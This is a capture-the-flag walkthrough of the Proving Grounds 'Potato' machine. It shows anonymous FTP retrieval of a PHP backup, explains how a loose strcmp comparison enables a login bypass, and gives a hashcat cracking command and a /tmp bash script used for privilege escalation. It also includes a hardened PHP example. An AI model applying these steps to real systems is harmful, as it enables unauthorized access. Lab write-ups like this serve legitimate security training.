Proving Ground Play — Potato

INTRODUCTION

ENUMERATION

FTP on Port 2112

  1. ftp <IP ADDRESS> -p 2112
  2. Specify "anonymous" as the username
  3. Specify <ANYTHING… no, I mean anything> as the password
  4. To list the files, use "ls -la"
  5. To get the files, use "get index.php.bak" and "get welcome.msg"

Observations from index.php.bak:

  1. It's clearly a type of PHP authentication page.
  2. There is a password specified as "potato" ($pass = "potato"), but the comment also clearly states it should be changed; let's hope they ignored it.
  3. The PHP page makes use of "loose" PHP comparisons, i.e. == and not === (strict).

HTTP on Port 80

FFuF options used:

  • -c: colour output
  • -ic: ignore wordlist comments
  • -w: wordlist to use
  • -u: URL to enumerate
  • -mc: which HTTP codes to report (match)
  • -fc: which HTTP codes to filter, e.g. 404
  • -e: file extensions to enumerate
  • -recursion: recursively enumerate directories, i.e. add a new FFuF job for each discovered directory

EXPLOITATION

PHP comparison operators:

  1. Loose: ==
  2. Strict: ===

The login page performs two checks:

  1. Has "admin" been specified as the username? The comparison is then == 0.
  2. Does the password specified match the variable "$pass"? The comparison is then == 0.
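The weak check beside its hardened form, as an added illustration for this write-up (not the box's own index.php.bak). It assumes the two checks above are strcmp(...) == 0 and that $pass holds the hard-coded password; both are assumptions, since the page only shows the "== 0" part.

```php
<?php
// Added illustration; not the box's own index.php.bak.
// Assumption: the two checks are strcmp(...) == 0 and $pass holds the
// hard-coded password from the write-up.

// Weak form: loose comparison. On PHP 7, strcmp() emits a warning and
// returns NULL (not an int) when given a non-string value, and NULL == 0
// is true under loose comparison, so a malformed request can satisfy the
// check without the real password. (PHP 8 throws a TypeError instead.)
function login_loose($user, $password, string $pass): bool
{
    return strcmp($user, 'admin') == 0 && strcmp($password, $pass) == 0;
}

// Hardened form: validate the type first, then compare strictly.
function login_strict($user, $password, string $pass): bool
{
    // Only plain strings may reach the comparison.
    if (!is_string($user) || !is_string($password)) {
        return false;
    }
    // === requires identical type and value; no type juggling.
    if ($user !== 'admin') {
        return false;
    }
    // hash_equals() is a strict, constant-time string comparison.
    // (In real code, store a password_hash() and use password_verify().)
    return hash_equals($pass, $password);
}

$pass = 'potato'; // the write-up's hard-coded value; should be changed

var_dump(login_strict('admin', 'potato', $pass));  // correct credentials
var_dump(login_strict('admin', 'wrong', $pass));   // wrong password
var_dump(login_strict(['admin'], ['x'], $pass));   // non-string input
```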
  1. Start by capturing the actual login in Burp Suite and send it to Repeater.

Cracking the hash:

  1. echo '<INSERT HASH HERE>' > hash.txt
  2. hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt

PRIVILEGE ESCALATION

  1. echo '#!/bin/bash' > /tmp/privEsc.sh
  2. echo '/bin/bash' >> /tmp/privEsc.sh
  3. chmod +x /tmp/privEsc.sh

CLOSING
